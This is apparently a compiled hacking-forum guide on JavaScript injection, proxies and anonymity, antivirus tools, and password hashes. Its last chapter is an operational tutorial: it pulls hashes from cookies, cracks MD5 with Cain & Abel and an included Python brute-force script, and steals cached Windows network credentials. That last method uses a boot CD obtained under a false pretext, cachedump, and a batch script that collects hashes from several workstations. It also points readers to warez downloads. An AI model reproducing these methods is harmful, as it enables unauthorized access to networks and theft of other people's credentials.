Using JavaScript in your browser's URL bar lets you change values on the page you are viewing. Now these changes are client side, but if you remember, websites use client-side JavaScript to serve a purpose, and by altering values you COULD by chance change the intended operation of the page you are viewing. (As learned in some HTS.org challenges.)

Remember, JavaScript does not have to be server-side, or even have to reach the server to make a difference; it is the "values" that make the difference. ( i.e. user=joey != user=admin ... I would much rather have user=admin )

Changing these values can give a number of things, depending on what the client-side JavaScript is being used for.
(Escalated privileges, infinite time, changing actions/methods, bypassing filters/auths)


XSS :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

NOTE: XSS IS NOT JAVASCRIPT INJECTION!!!

Cross-Site Scripting (XSS) is the process of executing script on a website where it is not intended. (This script could be HTML, JavaScript, PHP, whatever)

An HTML example would be adding links to a page where they are not intended.

XSS can be masked through forms, through AJAX, through tinyurls, through tons of methods, and the user does not have to be aware it has taken place.

XSS does NOT have to be GET variables.

People consider the use of JavaScript with XSS to be JavaScript injection, but using JavaScript through their browser is not. NEWS FLASH.. IT'S THE SAME THING. The JavaScript is still executed locally, and the server gets nothing except a log saying that a user made a malformed request.



DEFINE INJECTION FOR ME
::::::::::::::::::::::::::::::::::::::::

Related Definitions:
to introduce (a new aspect or element);
transitive verb add something to situation: to introduce a particular quality or element into a situation

If by now you think that using JavaScript through your browser's interpreter to change values on a page is not (introducing, or adding a quality or element) to the page you are viewing, then please re-read this article with an open mind. Else, you would agree that you can inject JavaScript locally, and therefore would agree that changing values with the browser's interpreter is called JavaScript injection.

To be honest, I'm sick of semantics; as long as you know Java != JavaScript, and you know what you are talking about, then who cares about the rest, you can call it javascript-intrusions for all I care. I did not write this to fight, offend or discourage anyone, just to simply prove my point.

On a last note, I don't care if you still do not agree with it; if you still argue with it you are ignorant. It does not hurt my feelings if you say I am wrong, so don't waste your breath.

Chapter 6: Anonymity


Part 1: Privacy Tools

Privacy software is software built to protect the privacy of its users. The first thing to look for when you buy Internet privacy software is ease of use. Privacy software is almost becoming a necessity with ID theft and computer hacking. Privacy software is designed to quickly and easily eliminate history files, shred deleted files and keep Windows "clean". Privacy software is not free and must be paid for after a trial period. Privacy software is available which can prevent the IP address you are using from being visible in the log files of the web sites that you visit. Privacy software is a program that destroys sensitive local files and documents and erases your tracks. This computer privacy software is a "must-have" tool for anyone who uses the Internet. Privacy software is unusual in that when it works successfully, unexpected intrusions or other problems are averted and appear to not have existed at all. The best privacy software is open source, so it's free. Firewalls and security/privacy software are designed to protect your computer by blocking the many unused and unsecured ports into your computer.

Privacy software will no doubt advance, as will the technology to beat it. Privacy software will ensure that no cookies remain on your computer that might give clues about your online activity. Privacy software ensures that deleted files really are deleted. Internet privacy software is designed to find and clean up files left by Windows. Use Internet privacy software to permanently remove deleted files. If you are concerned about Internet privacy, you should use privacy software.

While a good deal of quality privacy software is available for free, many programs are expensive. A firewall is good, internet security software is good, anti-virus is good, privacy software is good. While investing in anti-virus, firewall and privacy software is essential, don't think of it as a cure-all.

I've included some of these at the bottom of my post.

Part 2: Proxy Tools

1.0 First off what is a proxy?

In computer networks, a proxy server is a server (a computer system or an application program) which services the requests of its clients by forwarding requests to other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server provides the resource by connecting to the specified server and requesting the service on behalf of the client. A proxy server may optionally alter the client's request or the server's response, and sometimes it may serve the request without contacting the specified server.

A proxy server that passes all requests and replies unmodified is usually called a gateway or sometimes tunnelling proxy.

A proxy server can be placed in the user's local computer or at specific key points between the user and the destination servers or the Internet.


2.0 What applications can this have for anonymity?

The point of a proxy for anonymity is that the target's log files show the proxy's IP address instead of yours. In effect you are using (and, if anyone comes looking, blaming) someone else's address. Two caveats a practitioner should keep in mind: the proxy operator sees everything you send through it, and can read it unless the connection is encrypted end to end (HTTPS to the site, not just to the proxy); and most proxies keep logs of their own, so a single proxy moves the evidence rather than destroying it. Some "transparent" proxies also add headers such as X-Forwarded-For that hand your real address straight to the target. Chaining through several proxies run by different parties, which is what Tor does, is what makes the trail hard to follow.
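To make the mechanics concrete, here is an added example (not code from the original post, from Tor, or from any of the tools listed below): a minimal HTTP forward proxy written with Python's standard library, run against a local stand-in origin server. The origin records the TCP peer it saw and any X-Forwarded-For/Via headers. In "transparent" mode the proxy adds those headers and hands the real client address to the origin; in "anonymizing" mode it strips them. Everything runs on loopback, so both peer addresses come out as 127.0.0.1; on a real network the peer would be the proxy's address, and the headers are what decide whether yours leaks as well. Port numbers are ephemeral and the path /secret is made up.

```python
"""Added example: a tiny HTTP forward proxy run against a local origin
server, to show what the origin actually learns about the client.
Everything here is constructed for the demo; it is not code from the
original post or from any of the tools it names."""
import http.client
import http.server
import threading
from urllib.parse import urlsplit

ORIGIN_LOG = []  # what the origin server recorded for each request


class OriginHandler(http.server.BaseHTTPRequestHandler):
    """Stand-in for the target web site: logs peer address and proxy headers."""

    def do_GET(self):
        ORIGIN_LOG.append({
            "peer": self.client_address[0],          # the TCP peer (the proxy)
            "x_forwarded_for": self.headers.get("X-Forwarded-For"),
            "via": self.headers.get("Via"),
            "path": self.path,
        })
        body = b"hello from origin"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the console quiet
        pass


def make_proxy_handler(anonymizing: bool):
    """Forward proxy. anonymizing=False behaves like a 'transparent' proxy
    and tells the origin who the real client is; True strips that, as an
    'anonymous' proxy would."""

    class ProxyHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            # A proxy client sends an absolute URI: GET http://host:port/path
            target = urlsplit(self.path)
            headers = {}
            if not anonymizing:
                headers["X-Forwarded-For"] = self.client_address[0]
                headers["Via"] = "1.1 demo-proxy"
            upstream = http.client.HTTPConnection(target.hostname, target.port, timeout=5)
            upstream.request("GET", target.path or "/", headers=headers)
            resp = upstream.getresponse()
            data = resp.read()
            upstream.close()
            self.send_response(resp.status)
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def log_message(self, *args):
            pass

    return ProxyHandler


def serve(handler):
    """Start a server on an ephemeral loopback port in a background thread."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_via_proxy(proxy_port: int, origin_port: int) -> bytes:
    """Client side: connect to the proxy and ask it for a URL on the origin."""
    conn = http.client.HTTPConnection("127.0.0.1", proxy_port, timeout=5)
    conn.request("GET", f"http://127.0.0.1:{origin_port}/secret")
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return body


def run_demo() -> dict:
    """Send one request through each proxy type; return what the origin saw."""
    origin = serve(OriginHandler)
    seen = {}
    try:
        for name, anon in (("transparent", False), ("anonymizing", True)):
            proxy = serve(make_proxy_handler(anon))
            try:
                ORIGIN_LOG.clear()
                body = fetch_via_proxy(proxy.server_address[1], origin.server_address[1])
                seen[name] = dict(ORIGIN_LOG[0], body=body)
            finally:
                proxy.shutdown()
                proxy.server_close()
    finally:
        origin.shutdown()
        origin.server_close()
    return seen


if __name__ == "__main__":
    for kind, record in run_demo().items():
        print(kind, record)
```

Run it directly to print both records. A real proxy also has to handle CONNECT for HTTPS and many concurrent clients, but the header handling is the part that decides what the target logs about you, and it is exactly what separates a "transparent" proxy from an "anonymous" one in the proxy lists people trade.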

3.0 What are the best proxy tools?

Well, my number 1 favorite is Tor, which can be obtained here:

http://tor.eff.org/

But here are some other tools:

Hide Ip platinum
Steganos VPN
Cisco VPN
Freedom

Chapter 7: Antivirus and Hackers Defence

OK, you're a hacker, right? So why should you be worried about viruses/trojans/worms?

Because hackers hack hackers. In fact there are thousands of hackers whose speciality is hacking other hackers.

Also, some "tools" may be viruses/trojans/worms designed to look like a hacking tool. The warez and cracked-tool downloads mentioned later in this chapter are a classic delivery route, so scan them and run them somewhere disposable.

You need to protect yourself if you're going to survive them.

Part 1:

But first let's learn the difference between a virus, a trojan and a worm:

The most common blunder people make when the topic of a computer virus arises is to refer to a worm or Trojan horse as a virus. While the words Trojan, worm and virus are often used interchangeably, they are not the same. Viruses, worms and Trojan horses are all malicious programs that can cause damage to your computer, but there are differences among the three, and knowing those differences can help you to better protect your computer from their often damaging effects. A computer virus attaches itself to a program or file so it can spread from one computer to another, leaving infections as it travels. Much like human viruses, computer viruses can range in severity: some viruses cause only mildly annoying effects while others can damage your hardware, software or files. Almost all viruses are attached to an executable file, which means the virus may exist on your computer but it cannot infect your computer unless you run or open the malicious program. It is important to note that a virus cannot be spread without a human action (such as running an infected program) to keep it going. People continue the spread of a computer virus, mostly unknowingly, by sharing infected files or sending e-mails with viruses as attachments.

A worm is similar to a virus by its design, and is considered to be a sub-class of a virus. Worms spread from computer to computer, but unlike a virus, a worm has the capability to travel without any help from a person. A worm takes advantage of file or information transport features on your system, which allows it to travel unaided. The biggest danger with a worm is its capability to replicate itself on your system, so rather than your computer sending out a single worm, it could send out hundreds or thousands of copies of itself, creating a huge devastating effect. One example would be for a worm to send a copy of itself to everyone listed in your e-mail address book. Then the worm replicates and sends itself out to everyone listed in each receiver's address book, and the process continues on down the line. Due to the copying nature of a worm and its capability to travel across networks, the end result in most cases is that the worm consumes too much system memory (or network bandwidth), causing web servers, network servers and individual computers to stop responding. In more recent worm attacks such as the much-talked-about Blaster worm, the worm has been designed to tunnel into your system and allow malicious users to control your computer remotely.

Key Terms To Understanding Computer Viruses:

virus
A program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes.

Trojan Horse
A destructive program that masquerades as a benign application. Unlike viruses, Trojan horses do not replicate themselves.

worm
A program or algorithm that replicates itself over a computer network and usually performs malicious actions.

blended threat
Blended threats combine the characteristics of viruses, worms, Trojan horses, and malicious code with server and Internet vulnerabilities.

antivirus program
A utility that searches a hard disk for viruses and removes any that are found.


A Trojan Horse is full of as much trickery as the mythological Trojan Horse it was named after. The Trojan Horse, at first glance will appear to be useful software but will actually do damage once installed or run on your computer. Those on the receiving end of a Trojan Horse are usually tricked into opening them because they appear to be receiving legitimate software or files from a legitimate source. When a Trojan is activated on your computer, the results can vary. Some Trojans are designed to be more annoying than malicious (like changing your desktop, adding silly active desktop icons) or they can cause serious damage by deleting files and destroying information on your system. Trojans are also known to create a backdoor on your computer that gives malicious users access to your system, possibly allowing confidential or personal information to be compromised. Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate. Added into the mix, we also have what is called a blended threat. A blended threat is a sophisticated attack that bundles some of the worst aspects of viruses, worms, Trojan horses and malicious code into one threat. Blended threats use server and Internet vulnerabilities to initiate, transmit and spread an attack. This combination of method and techniques means blended threats can spread quickly and cause widespread damage. Characteristics of blended threats include: causes harm, propagates by multiple methods, attacks from multiple points and exploits vulnerabilities.

To be considered a blended threat, the attack would normally serve to transport multiple attacks in one payload. For example, it wouldn't just launch a DoS attack; it would also install a backdoor and damage a local system in one shot. Additionally, blended threats are designed to use multiple modes of transport. For example, a worm may travel through e-mail, but a single blended threat could use multiple routes such as e-mail, IRC and file-sharing networks. The actual attack itself is also not limited to a specific act. For example, rather than a specific attack on predetermined .exe files, a blended threat could modify .exe files, HTML files and registry keys at the same time; basically it can cause damage within several areas of your network at one time.

Blended threats are considered to be the worst risk to security since the inception of viruses, as most blended threats require no human intervention to propagate.

Combating Viruses, Worms and Trojan Horses

The first step to protecting your computer is to ensure your operating system (OS) is up to date. This is essential if you are running a Microsoft Windows OS. Secondly, you should have anti-virus software installed on your system and download updates frequently so that it has the latest signatures for new viruses, worms and Trojan horses. Additionally, make sure your anti-virus program can scan e-mail and files as they are downloaded from the Internet; this helps stop malicious programs before they are ever run. You should also install a firewall.

A firewall is a system that prevents unauthorized use of and access to your computer. A firewall can be either hardware or software. Hardware firewalls provide a strong degree of protection from most forms of attack coming from the outside world and can be purchased as a stand-alone product or built into broadband routers. Unfortunately, when battling viruses, worms and Trojans, a hardware firewall may be less effective than a software firewall, as it could ignore worms embedded in outgoing e-mails and see them as regular network traffic. For individual home users, the most popular firewall choice is a software firewall. A good software firewall will protect your computer from outside attempts to control or gain access to your computer, and usually provides additional protection against the most common Trojan programs or e-mail worms. The downside to software firewalls is that they will only protect the computer they are installed on, not a network.

It is important to remember that on its own a firewall is not going to rid you of your computer virus problems, but when used in conjunction with regular operating system updates and a good anti-virus scanning software, it will add some extra security and protection for your computer or network.

Part 2:

Best antivirus and anti-hacking tools (note: some of these may detect your hack tools as viruses)
Most of these can be found in our warez sections.

Cyberhawk Public Beta 1.0.0.37 Cyberhawk detects and protects you against all types of security threats including viruses, worms, spyware and hackers.
Sysinternals RootkitRevealer 1.56 RootkitRevealer is an advanced patent-pending root kit detection utility.
F-Secure BlackLight 2.2.1007 Beta F-Secure BlackLight Rootkit Elimination Technology detects objects that are hidden from users and security tools and offers the user an option to remove them.
AntiVir Personal Edition 6 Effective protection against computer viruses for the individual and private use.
AVG Anti-Virus Free 7.1.371
AVG Anti-Virus offers maximum virus protection, product customization, and free virus database updates and technical support.
ClamAV 0.87.1-2 ClamAV is an open source antivirus solution that features a command line interface for scanning files
avast! Home 4.6.739 avast! is an antivirus set that is able to detect the presence of viruses in computers.
McAfee AVERT Stinger 2.5.8 McAfee AVERT Stinger is a stand-alone utility used to detect and remove specific viruses

Best Anti-Spyware Tools - again, most of these can be found in our warez sections



SpyDefense 0.9.5.118 Beta SpyDefense protects your computer against annoying and harmful software such as Spyware, Adware, Trojan horses, etc.
Arovax Shield 1.2.314 Arovax Shield is a brand new type of personal security solution that is unlike any firewall, anti-virus or spyware remover.
freedom GUi 1.55.319X freedom GUi will find and remove spyware files from your PC, including spyware registry keys.
Arovax AntiSpyware 1.0.353 Beta Arovax AntiSpyware is an innovative, powerful, speedy and extremely easy to use Anti-Spyware scanner and remover.
Microsoft Windows AntiSpyware 1.0.701 Beta Windows AntiSpyware is a security technology that helps protect Windows users from spyware and other potentially unwanted software.
Nixory 0.3.4 Nixory is an open source anti-spyware program for Mozilla Firefox, designed to remove malicious data miners. It is written entirely in Python and PyGTK and runs on all the most used platforms (Windows, Linux, Unix, MacOS, Solaris, etc.).
Ad-aware SE Personal 1.06 Ad-Aware is designed to provide advanced protection from known Data-mining, aggressive advertising, Parasites, Scumware, selected traditional Trojans, Dialers, Malware, Browser hijackers, and tracking components.
HijackThis 1.99.1 A general homepage hijackers detector and remover.
Trend Micro CWShredder 2.15 Trend Micro CWShredder is the premier tool to find and remove traces of CoolWebSearch
Spybot Search and Destroy 1.4 Spybot Search and Destroy searches your hard drive for so-called spy- or adbots.

Chapter 8: HASH

PART 1: What is hash?

A hash is a fixed-length, one-way digest of your password (an MD5 hash is 32 hex characters), not an encrypted copy of it: there is no key that turns it back into the password, which is why "cracking" it means guessing candidates and hashing them. Sites sometimes store the hash in a cookie or in their database instead of the password itself.
An example of a hash:
F95B258A1C8913697FD83DB53F597474

PART 2: How do i get the hash?

This is different for every target. But as a basic way, type javascript:alert(document.cookie) in your address bar; it should be easy enough. If the site marks its cookies HttpOnly, document.cookie will not show them and you will need another route, such as an intercepting proxy or the browser's own cookie store.

PART 3: Cracking Hashs'

Hello Everybody, this is my first article so please be gentle.

First of all, this tutorial can be seen as a spoiler, since Realistic level 5 asks you to crack an MD5 hash.


Since I'm using Cain and Abel in this tutorial, you should get it before we start. Get it from http://www.oxid.it/cain.html

Download it, install it and open it.
When you've opened it you can see the main screen. Click the "Cracker" tab (the one with the key).

First we have to make clear what kind of encryption we're dealing with. In this tutorial I'll use an MD5 hash, because it's very common. Actually we're using two of them, to show two ways of cracking.

nr.1 =
9DF3B01C60DF20D13843841FF0D4482C
nr.2 =
F95B258A1C8913697FD83DB53F597474

So, this is a MD5 hash, just select "MD5 Hashes" in the left screen. Now click the big blue "+" at the top bar. Insert your hash (9DF3B01C60DF20D13843841FF0D4482C) and press [Enter].

The first thing we are going to do is to dictionary attack the hash. Since the hash can't be decrypted, you have to compare it. This means you have to MD5 loads of things and check whether one of them has the same hash. Using a dictionary attack you use a list of words which will be encrypted and compared. This is a rather fast way, but since not all passwords are words, it doesn't always work.

Right-click the hash on the big screen and select Dictionary Attack. Select a wordlist by clicking "Add". Cain and Abel has an English wordlist already included in the wordlists section. Select it and press OK. You can also add some more lists which Google will help you find.
If you already did an attack with the same dictionary, press "Reset". Just leave the checkboxes as they are. Now press Start. Since we've chosen 9DF3B01C60DF20D13843841FF0D4482C as our hash, after a while it will respond.

Plaintext of 9DF3B01C60DF20D13843841FF0D4482C is access
Attack stopped!
1 of 1 hashes cracked

This means access is the password! Got it!
If this doesn't work with your hash, try again with all the checkboxes checked. Still doesn't work? Let's go the hard way.

Using this method we will brute-force the hash. This means we'll encrypt and compare all combinations of the ASCII table. In our case, just take the numbers to save time. Otherwise it might take hours, days, months or years to crack it. So select predefined -> 0123456789. Also set min to 1 and max to 6. Of course you can change this, but you want a quick result, don't you?

Now, just press Start and tadaa:

Plaintext of F95B258A1C8913697FD83DB53F597474 is 347782
Attack stopped!
1 of 1 hashes cracked

The password was 347782.

-The above section was written by one of my dutch friends who goes by SjaakRake
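The same two attacks written out in Python, so you can see what Cain is doing under the hood. This is an added example, not SjaakRake's code and not Cain's: a dictionary attack with a few simple mangling rules (roughly what Cain's checkboxes do) and a digits-only brute force over lengths 1 to 6. The wordlist is constructed for the demo. Nothing is "decrypted"; every candidate is hashed and compared against the target, exactly as the text says.

```python
"""Added example: dictionary and brute-force attacks on unsalted MD5
password hashes, mirroring the two Cain & Abel runs in the text.
The wordlist is constructed; the hashes in main() are the ones quoted
in the tutorial above."""
import hashlib
import itertools
import string


def md5_hex(candidate: str) -> str:
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


def dictionary_attack(target_hex: str, wordlist, mangle: bool = True):
    """Hash each word (and, optionally, a few simple mangles of it) and
    compare with the target. Returns the plaintext or None."""
    target = target_hex.lower()
    for word in wordlist:
        word = word.strip()
        if not word:
            continue
        candidates = [word]
        if mangle:  # rough equivalents of Cain's case/reverse options
            candidates += [word.lower(), word.upper(), word.capitalize(), word[::-1]]
        for cand in candidates:
            if md5_hex(cand) == target:
                return cand
    return None


def brute_force(target_hex: str, charset: str = string.digits,
                min_len: int = 1, max_len: int = 6):
    """Try every string over charset with length in [min_len, max_len],
    shortest first, like Cain's predefined 0123456789 set with min=1, max=6."""
    target = target_hex.lower()
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            cand = "".join(combo)
            if md5_hex(cand) == target:
                return cand
    return None


def keyspace_size(charset_len: int, min_len: int, max_len: int) -> int:
    """Number of candidates a brute force over that range has to hash."""
    return sum(charset_len ** n for n in range(min_len, max_len + 1))


# Constructed wordlist for the demo; a real one has millions of entries.
SAMPLE_WORDLIST = ["password", "letmein", "access", "admin"]

if __name__ == "__main__":
    h1 = "9DF3B01C60DF20D13843841FF0D4482C"  # hash nr.1 from the text
    h2 = "F95B258A1C8913697FD83DB53F597474"  # hash nr.2 from the text
    print("dictionary:", dictionary_attack(h1, SAMPLE_WORDLIST))
    print("digits 1-6 keyspace:", keyspace_size(len(string.digits), 1, 6))
    print("brute force:", brute_force(h2))
```

keyspace_size shows why the charset and length limits matter so much: digits of length 1 to 6 is about 1.1 million candidates, while the full printable ASCII set over the same lengths is about 7.4 x 10^11, the difference between a second and days on one CPU. MD5 here has no salt, so a hash cracked once is cracked for every site that stores the same password the same way; that is the property the MS-cache hashes in Part 4 do not have.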

Part 4:Gaining network hashes from a standard workstation (windows)

Hey guys.

I did do a search on existing articles to see if this had been posted, but i didn't come up with anything so I guess I'll cover it.

Sometimes, when you want to extract hashes from a network but have no access to the main server, only a terminal workstation, you have no access to the network administrative account, and thus cannot pipe the hashes from pwdump, or fgdump for that matter. When this happens you are somewhat limited in your options. However, it's possible for even the most noobish of beginners to gain local administrator access with a boot CD. Often you can do this with someone present, as you just say you need to install a program for your work and the network won't let you. That's a good excuse, which incidentally happened to be true for me, which enabled me to find it out. I won't go into that in much detail, but the boot CD I would recommend is dreampackpl (google it, it was on the first page last time I checked, complete with operating instructions), as not only can you change the administrator password or add an account, you can set it to log you in on the local machine with just a username, or set a god password, to much the same effect. It also has a logon logger, which is the only logon logger I've ever actually encountered. The tutorial that comes on the site doesn't go into much detail on those points, but it's easy to figure out how to use it with a few minutes of playing around, thanks to its helpful GUI.

Anyway, Windows by default logs an MS-cache hash for the last ten network users (in case of network failure and people still needing access to a terminal). This value can be changed in the registry. The key this is located at comes in a .txt file with cachedump, or at least it did when I downloaded it. (If it's not in the download link I'm about to give you shortly and you want to know, PM me and I'll be happy to PM you back with the key.)

You may download cachedump here:
http://meshier.com/2007/03/08/auditing-cac...with-cachedump/
NOTE: I have not checked this download link, I just trawled through google until I found a site offering download, as the original site doesn't allow public access of cachedump anymore.

Once you have downloaded cachedump, place its folder on your flash drive. Then, when logged in as a local administrator, navigate to the folder in CMD and run the line:
cachedump.exe >something.txt
You may change something to anything that takes your fancy; that's just the one I use. (<sarcasm>Very imaginative, I know</sarcasm>)

Now the hashes you've just piped onto your flash drive can be cracked in one of two ways, to my knowledge.

You can either download a patch for JTR (just google for it, I think it's called bigpatch or something).
Or you can crack them in Cain, which is my personal choice. Now Cain has its own ms-cache ripper, but it has to be installed and all sorts of things that you don't want to bother with. The one problem is that it has its own format for hashes, which it expects. We can get around this, however.

I take NO credit for the method of conversion and importing the hashes into Cain; I found this part in an article on www.irongeek.com (which I suggest you visit, if you haven't already. It's a great site, with some very informative tutorials, plus the owner, one Adrian Crenshaw if memory serves, is very helpful and if you email him with any problems you have about his tutorials he tries his best to help.)

The link for this article is:
http://www.irongeek.com/i.php?page=securit...&mode=print
The part on conversion and implementing is half way down the page, but I'll do my best to explain it here as well. I would, however, like to point out that I was using cachedump before I read this article, and only used it for the conversion and addition to Cain, so I'm NOT copying.

Anyway, the brunt of that article is that you have to convert your hashes, which you can do automatically at this site:
http://mp3host.serveftp.com:8888/pages/cache.php
This server is a privately owned one, and it's never been down when I've used it, but don't be surprised if it has some downtime at times. Once you've got your converted hashes, go to Cain's program files, and when you're there you'll find a file called CACHE which is a MASM listing. Open this up in Notepad, paste in your converted hashes and save. Load up Cain and switch to the cracker, and they should be there.

A note about ms-cache hashes:
ms-cache hashes use a much more complicated algorithm than LM hashes, and consequently are far more difficult to crack. They are also salted, which makes rainbow tables too large and cumbersome, unless you have a supercomputer, in which case you'll probably have them done anyway inside the hour. This of course makes it far more important to have a decent wordlist while cracking them, and also means that LM hashes are always preferable.

As a last point, I use batch scripts to make gaining the hashes easier, so I thought I would include them here.

Put the drive letter your flash drive will be on the target machine on the first line (E: below is only an assumption; use yours).
E:
cd \hacking stuff\cachedump
cachedump.exe >>something.txt
("hacking stuff" is just the folder I keep the cachedump folder in; if yours is in the root of the flash drive, leave that part out. The >> appends rather than overwrites, so running the script on several machines collects all the hashes in one file.)

I know that was a simple batch script, and that most people here could have written that themselves inside of a few seconds, but this is just for the people that are new to this sort of thing. If you are one of those people, take note that to make this work you type it into notepad, and save it as a filename.bat

As a final point, if you have ANY questions on the above article, or it is written improperly, please PM me, and I'll get back to you as soon as I am able.

-Avinash


Avinash.Gamerboy




